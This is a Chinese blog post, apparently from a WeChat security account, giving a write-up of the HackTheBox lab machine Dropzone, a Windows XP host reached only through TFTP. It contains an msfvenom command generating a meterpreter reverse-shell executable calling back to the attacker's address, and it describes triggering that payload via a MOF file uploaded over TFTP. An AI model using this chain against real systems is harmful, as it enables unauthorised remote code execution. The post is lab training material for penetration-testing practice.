大余安全
一个每日分享渗透小技巧的公众号
大家好,这里是 大余安全 的第 75 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/139
靶机难度:中级(5.0/10)
靶机发布日期:2018年11月4日
靶机描述:
Dropzone is an interesting machine that highlights a technique used by the Stuxnet worm. The discovery of NTFS data streams provides an additional challenge.
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.90....
可以看到,不存在TCP服务...看看UDP
nmap发现了69的tftp服务开放着...
竟然只开放了tftp服务,这里可以进行查询命令帮助...开始找问题收集信息...
这里尝试下载,发现权限是开放着,是名称打错的原因?试试...
直接尝试下载boot.ini这是windows系统运行参数的文件...可以看到这是windows xp系统...
XP系统,这里可以开始提权了...GO
二、提权
方法1:
这里利用MSF进行提权...
git clone https://github.com/Sayantan5/Dropzone
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.11 lport=443 -f exe > dayu.exe
这里利用msfvenom生成.exe的shellcode...然后利用hack.mof触发shellcode...这里.mof是某位大神利用wbemexec.rb编码写的...
前提要将Mode模式转换成octet...
然后上传dayu.exe,成功上传...
可以看到直接提权成功...这是5.0的分值的靶机...这么容易?????
我觉得没这么容易,不给下载...进去看看...
果然...It's easy, but not THAT easy...
这里真的恶心...10~1分钟不等之间会自动退出shell...不稳定...
还好我用了MSF进行监听...
这里可以发现一个flags下的.txt文本...
再次尝试查看,制动关闭的shellcode....
这里需要利用Streams查看数据信息流...
利用tftp上传...我快吐了...HTBwindows服务器最近很卡很卡...可以看到我上传了527秒...
等了这么久我竟然没想到利用smbserver开启smb共享,然后在靶机里\10.10.14.11...下载streams.exe...可能太累了...
成功读取数据流获得了root/user信息...
太卡了,可能是HTB的windows服务器问题,也有人反馈了说很卡...
还有就是只开放一个端口,有时候会有别的玩家进来和我在同一个屋檐下...不冲突都难...
由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~随缘收徒中~~随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
本文始发于微信公众号(大余安全):HackTheBox-windows-Dropzone
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论